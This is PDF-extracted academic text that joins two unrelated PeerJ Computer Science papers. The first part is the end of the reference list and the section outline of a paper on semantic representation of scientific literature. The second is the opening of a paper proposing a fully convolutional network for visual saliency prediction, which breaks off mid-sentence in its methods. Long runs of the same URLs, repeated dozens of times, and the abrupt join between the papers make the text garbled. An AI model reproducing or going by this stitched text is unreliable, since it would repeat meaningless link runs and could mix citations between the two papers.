http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://www.balisage.net/Proceedings/vol3/html/Peroni01/BalisageVol3-Peroni01.html http://dx.doi.org/10.7717/peerj-cs.37 Groza T, Handschuh S, Möller K, Decker S. 2008. KonneXSALT: first steps towards a semantic claim federation infrastructure. In: Bechhofer S, Hauswirth M, Hoffmann J, Koubarakis M, eds. The semantic web: research and applications, LNCS, vol. 5021. Berlin, Heidelberg: Springer, 80–94. Groza T, Möller K, Handschuh S, Trif D, Decker S. 2007b. SALT: weaving the claim web, Lecture notes in computer science, vol. 4825. Berlin, Heidelberg: Springer. Heath T, Bizer C. 2011. Linked data: evolving the web into a global data space, Synthesis lectures on the semantic web: theory and technology. San Rafael: Morgan & Claypool Publishers. Liakata M, Saha S, Dobnik S, Batchelor CR, Rebholz-Schuhmann D. 2012. Automatic recognition of conceptualization zones in scientific articles and two life science applications. Bioinformatics 28(7):991–1000 DOI 10.1093/bioinformatics/bts071. Liakata M, Soldatova L. 2008. Guidelines for the annotation of general scientific concepts. Technical Report, Aberystwyth University. JISC project report. Available at http://ie-repository. jisc.ac.uk/88. Liakata M, Teufel S, Siddharthan A, Batchelor CR. 2010. Corpora for the conceptualisation and zoning of scientific papers. In: International conference on language resources and evaluation (LREC). Available at http://www.lrec-conf.org/proceedings/lrec2010/pdf/644 Paper.pdf. Malhotra A, Younesi E, Gurulingappa H, Hofmann-Apitius M. 2013. ‘HypothesisFinder:’ a strategy for the detection of speculative statements in scientific text. PLoS Computational Biology 9(7):e1003117 DOI 10.1371/journal.pcbi.1003117. Mann WC, Thompson S. 1988. Rhetorical structure theory: towards a functional theory of text organization. Text 8(3):243–281. Marcu D. 1999. A decision-based approach to rhetorical parsing. In: Proceedings of the 37th annual meeting of the Association for Computational Linguistics on Computational Linguistics. Association for Computational Linguistics, 365–372. Mendes PN, Jakob M, Garcı́a-Silva A, Bizer C. 2011. DBpedia spotlight: shedding light on the web of documents. In: Proc. of the 7th international conf. on semantic systems. New York: ACM, 1–8. Naak A, Hage H, Aimeur E. 2008. Papyres: a research paper management system. In: 10th IEEE international conference on e-commerce technology (CEC 2008)/5th IEEE international conference on enterprise computing, e-commerce and e-services (EEE 2008). Piscataway: IEEE, 201–208. Peroni S. 2012. Semantic Publishing: issues, solutions and new trends in scholarly publishing within the Semantic Web era. PhD dissertation, University of Bologna. Rupp C, Copestake A, Teufel S, Waldron B. 2006. Flexible interfaces in the application of language technology to an eScience corpus. In: Proceedings of the UK e-Science programme all hands meeting 2006 (AHM2006). Available at http://www.allhands.org.uk/2006/proceedings/papers/ 678.pdf. Sanderson R, Bradshaw S, Brickley D, Castro LJG, Clark T, Cole T, Desenne P, Gerber A, Isaac A, Jett J, Habing T, Haslhofer B, Hellmann S, Hunter J, Leeds R, Magliozzi A, Morris B, Morris P, Van Ossenbruggen J, Soiland-Reyes S, Smith J, Whaley D. 2013. Open annotation data model. In: W3C community draft. Available at http://www.openannotation.org/spec/core/. Sateli B, Witte R. 2014. Supporting researchers with a semantic literature management wiki. In: The 4th workshop on semantic publishing (SePublica 2014), CEUR workshop proceedings, vol. 1155. Crete: Anissaras. Sateli B, Witte R. 2015. Automatic construction of a semantic knowledge base from CEUR workshop proceedings. In: Semantic web evaluation challenges: SemWebEval 2015 at ESWC 2015, Portorož, Slovenia, May 31–June 4, 2015, revised selected papers, Communications in computer and information science, vol. 548. Berlin, Heidelberg: Springer, 129–141. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 26/27 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/bioinformatics/bts071 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://ie-repository.jisc.ac.uk/88 http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://www.lrec-conf.org/proceedings/lrec2010/pdf/644_Paper.pdf http://dx.doi.org/10.1371/journal.pcbi.1003117 http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.allhands.org.uk/2006/proceedings/papers/678.pdf http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://www.openannotation.org/spec/core/ http://dx.doi.org/10.7717/peerj-cs.37 Shotton D, Portwin K, Klyne G, Miles A. 2009. Adventures in semantic publishing: exemplar semantic enhancements of a research article. PLoS Computational Biology 5(4):e1000361 DOI 10.1371/journal.pcbi.1000361. Soldatova LN, Clare A, Sparkes A, King RD. 2006. An ontology for a Robot Scientist. Bioinformatics 22(14):e464–e471 DOI 10.1093/bioinformatics/btl207. Teufel S. 2010. The structure of scientific articles: applications to citation indexing and summarization. Stanford: Center for the Study of Language and Information. Teufel S, Moens M. 2002. Summarizing scientific articles: experiments with relevance and rhetorical status. Computational Linguistics 28(4):409–445 DOI 10.1162/089120102762671936. Teufel S, Siddharthan A, Batchelor CR. 2009. Towards discipline-independent argumentative zoning: evidence from chemistry and computational linguistics. In: EMNLP. Stroudsburg: ACL, 1493–1502. Usbeck R, Ngonga Ngomo A-C, Auer S, Gerber D, Both A. 2014. AGDISTIS–graph-based disambiguation of named entities using linked data. In: International semantic web conference (ISWC), LNCS. Berlin, Heidelberg: Springer. Weibel S, Kunze J, Lagoze C, Wolf M. 1998. Dublin core metadata for resource discovery. Internet Engineering Task Force RFC 2413, 222. Available at https://www.ietf.org/rfc/rfc2413.txt. Yosef MA, Hoffart J, Bordino I, Spaniol M, Weikum G. 2011. AIDA: an online tool for accurate disambiguation of named entities in text and tables. Proceedings of the VLDB Endowment 4(12):1450–1453. Sateli and Witte (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.37 27/27 https://peerj.com/computer-science/ http://dx.doi.org/10.1371/journal.pcbi.1000361 http://dx.doi.org/10.1093/bioinformatics/btl207 http://dx.doi.org/10.1162/089120102762671936 https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt https://www.ietf.org/rfc/rfc2413.txt http://dx.doi.org/10.7717/peerj-cs.37 Semantic representation of scientific literature: bringing claims, contributions and named entities onto the Linked Open Data cloud Introduction Background Rhetorical entities Document markup vocabularies Named entity linking Summary Design Automatic detection of rhetorical entities Automatic detection of named entities Semantic representation of entities Implementation Pre-processing the input documents Rhetector: automatic detection of rhetorical entities LODtagger: named entity detection and grounding using DBpedia spotlight LODeXporter: knowledge base population Evaluation Quantitative analysis of the populated knowledge base Text mining pipeline evaluation Accuracy of NE grounding with Spotlight Application Conclusion References work_e2z3bbfbmvbzjjspphct63bhsa ---- Submitted 10 December 2019 Accepted 7 June 2020 Published 13 July 2020 Corresponding author Bashir Muftah Ghariba, bmg063@mun.ca Academic editor Pinar Duygulu Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.280 Copyright 2020 Ghariba et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A novel fully convolutional network for visual saliency prediction Bashir Muftah Ghariba1,2, Mohamed S. Shehata3 and Peter McGuire4 1 Faculty of Engineering & Applied Science, Memorial University of Newfoundland, St. John’s, NL, Canada 2 Department of Electrical and Computer Engineering, Faculty of Engineering, Elmergib University, Khoms, Libya 3 Department of Computer Science, Mathematics, Physics and Statistics, University of British Columbia, Kelowna, BC, Canada 4 C-CORE, St John’s, NL, Canada ABSTRACT A human Visual System (HVS) has the ability to pay visual attention, which is one of the many functions of the HVS. Despite the many advancements being made in visual saliency prediction, there continues to be room for improvement. Deep learning has recently been used to deal with this task. This study proposes a novel deep learning model based on a Fully Convolutional Network (FCN) architecture. The proposed model is trained in an end-to-end style and designed to predict visual saliency. The entire proposed model is fully training style from scratch to extract distinguishing features. The proposed model is evaluated using several benchmark datasets, such as MIT300, MIT1003, TORONTO, and DUT-OMRON. The quantitative and qualitative experiment analyses demonstrate that the proposed model achieves superior performance for predicting visual saliency. Subjects Computer Vision, Data Mining and Machine Learning Keywords Deep learning, Convolutional neural networks, Fully Convolutional Network, Semantic Segmentation, Encoder-decoder architecture, Human eye fixation INTRODUCTION A Human Visual System (HVS) processes a part of the visual scene instead of the whole scene. This phenomenon is called Human Visual Attention (HVA), also referred to as visual saliency prediction, which is an important research area in the field of computer vision. HVA is also known as human eye fixation prediction, visual saliency prediction, or saliency map detection. Visual saliency prediction is also beneficial for other applications in the computer vision field, including salient object detection (Liu & Han, 2016), image retrieval (Huang et al., 2011), multiresolution imaging (Lu & Li, 2013), and scene classification (Cheng et al., 2015; Lu, Li & Mou, 2014; Yao et al., 2016). Many models have been developed to predict visual saliency, the most popular being the saliency map. Saliency maps describe the probability that each image pixel will attract human attention. In other words, saliency maps are images that display the unique qualities of each pixel in a given image (Gao & Vasconcelos, 2005). To produce a saliency map, the salient points in the image are collected and convolved with a Gaussian filter (Gao & Vasconcelos, 2005). The probability that each pixel in the image will attract human attention is represented by a heat map or gray-scale image. Notably, saliency maps smooth How to cite this article Ghariba BM, Shehata MS, McGuire P. 2020. A novel fully convolutional network for visual saliency prediction. PeerJ Comput. Sci. 6:e280 http://doi.org/10.7717/peerj-cs.280 https://peerj.com/computer-science mailto:bmg063@mun.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.280 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.280 the image, making it more meaningful and easier to analyze. This is useful for condition image captioning architecture because it indicates what is salient and what is not (Mackenzie & Harris, 2017). To evaluate the saliency map, human eye fixation data in free viewing is used because there is a direct link between human eye movement and visual attention (Mackenzie & Harris, 2017). Generally, HVA runs on two approaches. The first is a bottom-up approach which utilizes low-level features, including intensity, color, edge orientation, and texture (Gao, Mahadevan & Vasconcelos, 2008; Le Meur et al., 2006). Such an approach attempts to decide regions that show obvious characteristics of their surroundings. The second is a top-down approach, which is task-driven and requires an explicit understanding of the context of the visual scene. Moreover, it depends on the features of the object of interest (Gao, Han & Vasconcelos, 2009; Kanan et al., 2009). The deep Convolutional Neural Network (CNN) is the most widely utilized deep learning method for image processing applications (Mahdianpari et al., 2018). Specifically, CNN is capable of extracting discriminant visual features (e.g., 2-D spatial features) by applying a hierarchy of convolutional filters using multiple nonlinear transformations. Studies have also used Convolutional Neural Networks (CNNs) for studying saliency map detection to confirm the importance of end-to-end task learning and automatic feature extraction (Fang et al., 2016; Jetley, Murray & Vig, 2016; Kruthiventi et al., 2016; Pan et al., 2016; Vig, Dorr & Cox, 2014). The deep CNN model achieves an even higher classification accuracy. For example, deep learning techniques have achieved superior results in multiple tasks, such as driverless car, scene classification, object (e.g., vehicle) detection, image classification, and semantic segmentation. However, deep learning architecture requires sufficient training data for superior performance on several sets of visual tasks, such as local image detection (Girshick et al., 2014), global image classification (Krizhevsky, Sutskever & Hinton, 2012), and semantic segmentation (Long, Shelhamer & Darrell, 2015). Although several deep learning models have been proposed to solve the problem of saliency prediction, and those models provide good performance. However, those models essentially proposed for object recognition and then fine-tuned for saliency prediction. Consequently, the pixel-based classification of visual attention task remains challenging. This highlights the necessity of designing a novel FCN model specifically for the task of saliency prediction. In addition, our proposed model is designed for training from scratch. Therefore, we added some modules (e.g., three inception modules and residual modules) to improve the model performance. The inception module is useful since benefits from filters with different sizes in one layer, which contribute to multi-scale inference and enhance contextual information. This highlights the necessity of combining feature maps at different resolution to extract useful information. In addition the residual module recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. In this study, we utilized an encoder–decoder structure based on the Fully Convolutional Network (FCN) architecture to address the problem of bottom-up visual attention in visual saliency predication. FCN has the same architecture as the CNN network, but unlike CNN it does not contain any fully connected layers. FCNs are also powerful visual models that Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 generate high-level features from low-level features to produce hierarchies. Moreover, FCN utilizes multi-layer information and addresses pixel-based classification tasks using an end-to-end style (Long, Shelhamer & Darrell, 2015). In addition, the proposed model also includes both inception and residual modules to improve multi-scale inference and the recovery of more accurate information, respectively. This study proposes a new model based on an encoder–decoder structure (i.e., FCN) to improve the performance of visual saliency prediction. The specific contributions of this work are as follows: (1) A new model of FCN architecture for visual saliency prediction that uses two types of modules is proposed. The first module contains three stages of inception modules, improves the multi-scale inference, and performs contextual information. The second module contains one stage from the residual module and also recovers more accurate information and simplifies optimization, while avoiding the vanishing gradient problem. (2) Four well-known datasets, including TORONTO, MIT300, MIT1003, and DUT- OMRON, were used to evaluate the proposed model. The experiments demonstrate that the proposed model achieves results comparable or superior to those of other state-of-the-art models. The remainder of this article is organized as follows. First, the proposed model is described in more detail in ‘Related Work’ and the materials and methods used to produce and evaluate the proposed model are discussed in ‘Material and Methods’. ‘Experimental Results’ presents the quantitative and qualitative experimental results obtained from the four datasets. Finally, the results are summarized, and possible future uses and applications of the proposed model are explored in ‘Discussion’. RELATED WORK Visual saliency prediction has received attention from computer vision researchers for many years. The earliest computational model was introduced by Koch and Ullman (Krizhevsky, Sutskever & Hinton, 2012), which inspired the work of Itti, Koch & Niebur (1998). This model combines low level features at multiple scales to generate saliency maps. Subsequently, many models have been proposed to address visual saliency detection (Fu et al., 2015; Gong et al., 2015; Guo et al., 2017; Li et al., 2014; Liu et al., 2016; Liu et al., 2014a; Liu, Zou & Meur, 2014b; Wang & Shen, 2017; Wang et al., 2019a; Wang et al., 2016; Wang et al., 2017b). Most of this work has been focused on how to detect visual saliency in an image/video using different methods (Borji & Itti, 2012; Wang, Shen & Shao, 2017a; Wang et al., 2019b). Most conventional attention models are based on a bottom-up strategy. These contain three important steps to detect visual saliency: feature extraction, saliency extraction, and saliency combination. Salient regions in the visual scene are first extracted from their surroundings through hand-crafted low-level features (e.g., intensity, color, edge orientation, and texture), and center–surround contrast is widely used for generating saliency. The saliency may also be produced by the relative difference between the region and its local surroundings (Itti, Koch & Niebur, 1998; Harel, Koch & Perona, 2007; Bruce & Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Tsotsos, 2006). The last step for saliency detection combines several features to generate the saliency map. Recently, many visual saliency models have been introduced for object recognition. Deep-learning models achieved better performance compared to non-deep learning models. The Deep Neural Networks (DNN) (Vig, Dorr & Cox, 2014), was trained from scratch to predict saliency. Subsequent models were based on pre-trained models, for example, the DeepGaze I model (Kümmerer, Theis & Bethge, 2014), which was the first to be trained on a pre-trained model (AlexNet Krizhevsky, Sutskever & Hinton, 2012) trained on ImageNet (Deng et al., 2009), and outperformed the training stage from scratch. DeepGaze II (Kümmerer, Wallis & Bethge, 2016) has also has been proposed based on a pre-trained model (VGG-19 Simonyan & Zisserman, 2014), where attention information was extracted from the VGGNet without fine-tuning the attention task. Next, the DeepFix model Kruthiventi, Ayush & Babu (2017) was proposed by Kruthiventi et al. based on a pre-trained model VGG-16. Furthermore, in Mahadevan & Vasconcelos (2009) object detection and saliency detection were carried out using a deep convolutional neural network (CNN). Finally, the SALICON net model (Huang et al., 2015) was proposed to capture multi-scale saliency using combined fine and coarse features from two-stream CNNs that were trained with multi-scale inputs. Since the superior success of transfer learning models for visual saliency prediction has been established, several new models have been proposed that have improved saliency prediction performance. For instance, the SALICON model fine-tunes a mixture of deep features (Huang et al., 2015) using AlexNet (Krizhevsky, Sutskever & Hinton, 2012), VGG- 16 network (Simonyan & Zisserman, 2014), and GoogleNet (Szegedy et al., 2015) for visual saliency prediction. PDP (Jetley, Murray & Vig, 2016) and DeepFix (Kruthiventi, Ayush & Babu, 2017) were used on the VGG-19 network for the same task using MIT300 and the SALICON dataset, and FUCOS (Bruce, Catton & Janjic, 2016) fine-tunes features that were trained on the PASCAL dataset. Overall, DeepFix and SALICON models demonstrated significantly improved performance compared to DeepGaze I in the MIT benchmark. MATERIAL AND METHODS Proposed model The proposed model follows an FCN structure (i.e., a pixel-based approach) and the generic encoder–decoder form. The important difference between CNN and FCN networks is that the latter has learning filters throughout its structure. Even the decision-making layers at the end of the network are filters. FCNs also do not have any fully connected layers that are usually available at the end of the network. Figure 1 explains the architecture of the proposed model for visual saliency prediction and the configuration of the proposed model is explained in Table 1. The encoder stage contains three blocks of convolution layers, each of which is followed by batch normalization, rectified linear unit (ReLU), and max pooling. The encoder stage is the same as that of a conventional CNN and generates feature maps by down-sample pooling. The decoder stage also transposes convolutional layers but does so in the opposite direction. Ghariba et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.280 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.280 Figure 1 Architecture of the proposed model. Full-size DOI: 10.7717/peerjcs.280/fig-1 Table 1 Configuration of the proposed model. Layer type Filter size Encoder Convolution 3×3, 64 Residual Module (*), 64 Convolution 3×3, 128 Max pooling 2×2 Convolution 3×3, 256 Max pooling 2×2 Decoder Inception Module (*), 256 Transposed convolution 3×3, 256 Convolution 3×3, 256 Convolution 3×3, 128 Transposed convolution 3×3, 64 Convolution 3×3, 2 Pixel Classification Layer − Therefore, the decoder stage produces label maps (up-sampling) with the same input image 